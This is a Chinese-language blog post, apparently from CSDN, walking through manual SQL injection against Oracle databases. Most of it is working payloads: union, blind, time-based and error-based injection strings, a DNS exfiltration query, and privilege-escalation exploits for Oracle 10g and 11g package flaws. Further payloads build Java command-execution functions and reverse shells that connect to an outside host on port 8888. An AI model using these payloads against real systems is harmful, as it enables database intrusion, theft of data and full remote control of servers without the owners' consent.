记一次手工注入Oracle数据库

最新推荐文章于 2025-09-21 10:25:31 发布

原创最新推荐文章于 2025-09-21 10:25:31 发布 · 2.8k 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#oracle #sql注入 #手工sql注入

SQL注入专栏收录该内容

1 篇文章

订阅专栏

本文详细记录了一次手工注入Oracle数据库的过程，涵盖了Oracle的简单介绍、布尔盲注、延时注入、报错注入等技巧。重点讨论了Oracle存储过程提权，通过讲解在不同版本中的漏洞利用，如Oracle 10g的提权漏洞，以及如何通过创建JAVA代码和函数进行权限提升或反弹shell。最后提到了Oracle 11g的逻辑漏洞，展示了如何在具备create session权限的情况下赋予任意Java权限。

记一次手工注入oracle数据库

枕头要常晒因为里面装满了发霉的梦想。

oracle简单介绍：

 Oracle默认的用户有两个sys和system，并且每个用户都会有各自的角色，如DBA、Resource、Connect，DBA权限最高，可以创建库、用户等，Resouce可以创建实例，而connect只能查询表。

oracle简单利用：

因为有点涉密直接过滤url，可以自行搭建靶机测试。

1、首先判断是否存在注入点 and 1=1/and 1=2
2、然后在判断是什么类型数据库and (select count (*) from dual)>0  
Ps：Dual为oracle的一个默认表
3、判断列数order by 看页面是否正常显示
4、联合注入， union select null,null,null,null,null,null,null from dual
然后在通过改变null为字符型,如‘1’，判断显示位
5、根据显示位，查看数据库版本信息及当前数据库
union select null,null,null,null,null, (select banner from sys.v_$version where rownum=1),null from dual
union select null,null,null ,null,null, (SELECT name FROM v$database),null from dual
6、查看当前用户
union select null,null,null ,null,null, (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null from dual
7、直接跑所有表
union select null,null,null ,null,null, TABLE_NAME,null from USER_TABLES
8、跑表字段
union select null,null,COLUMN_NAME,null,null,null,null from 当前数据库 where TABLE_NAME='具体表名'
9、跑数据
union select null,null,null ,null,null, 字段1||'='||字段2,null from 具体表名

布尔盲注

and 1=(select decode(substr(user,1,1),'S',1,0) from dual
and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual)
and 1=(instr((select user from dual),'SYS')) 
and (select ascii(substr(username,1,1)) from admin)=97
select utl_inaddr.get_host_address((select user from dual)||'www.dns.com') from dual)is not null-- 站库分离dns传

延时注入

select decode(substr(user,1,1),'A',DBMS_PIPE.RECEIVE_MESSAGE('a',5) ,0) from dual

报错注入

and 1=ctxsys.drithsx.sn(1,(select user from dual))—
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null—
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null—

oracle存储过程提权：

在oracle存储过程中，运行权限有两种权限，一个的difiner(为函数创建者权限，创建时默认创建者权限，一般都是dba高权限创建)和invoker（调用函数的用户权限），简单来说就是我们在低权限下运行高权限创建的存储过程，我们在调用的时候，就是可以访问高权限的资源以及使用高权限。提权的话主要由于高权限用户创建存储过程没有经过安全处理或者被绕过，低权限用户直接调用该存储过程函数，执行命令。

oracle10g提权漏洞以及反弹shell：

影响版本:Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2
GET_DOMAIN_INDEX_TABLES 函数存在注入漏洞，该函数位于 DBMS_EXPORT_EXTENSION 包中，执行权限隶属于 dba，执行以下即可获取dba权限。
1、利用漏洞

Create or REPLACE

PACKAGE HACKERPACKAGE AUTHID CURRENT_USER

IS

FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env

SYS.odcienv)

RETURN NUMBER;

END;

/

2、赋予权限
Create or REPLACE

PACKAGE HACKERPACKAGE AUTHID CURRENT_USER

FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env

SYS.odcienv)

RETURN NUMBER;

END;

/
3、提权

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SCOTT';
TYPE_NAME := 'HACKERPACKAGE';
TYPE_SCHEMA := 'SCOTT';
VERSION := '10.2.0.1.0';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME =>
INDEX_NAME,
INDEX_SCHEMA=> INDEX_SCHEMA,
TYPE_NAME => TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA,
VERSION => VERSION,
NEWBLOCK => NEWBLOCK,
GMFLAGS => GMFLAGS);
END;
/
/

当有dba/rescouce权限（或者）获取系统权限:即可创建JAVA代码->赋予JAVA执行权限->创建函数->赋予函数执行权限->执行命令


and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') from dual) is not null--

当有dba/rescouce权限反弹shell:创建JAVA代码->创建函数->赋予函数执行权限->反弹shell
windows

and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("1.1.1.1", 8888);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select sys.reversetcp from dual) is not null--

当有dba/rescouce权限反弹shell:创建JAVA代码->->赋予JAVA代码权限->创建函数->赋予函数执行权限->反弹shell
linux

and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/1.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};Process p=Runtime.getRuntime().exec(aaa);}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--
and (select sys.reversetcp from dual) is not null--

oracle11g逻辑漏洞：

影响版本:11g
要是有create session权限的用户（连数据库的权限）, 因为允许了public调用DBMS_JVM_EXP_PERMS中的函数，便可以赋予任意java权限：

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

余生很长，请多指教。
在这里插入图片描述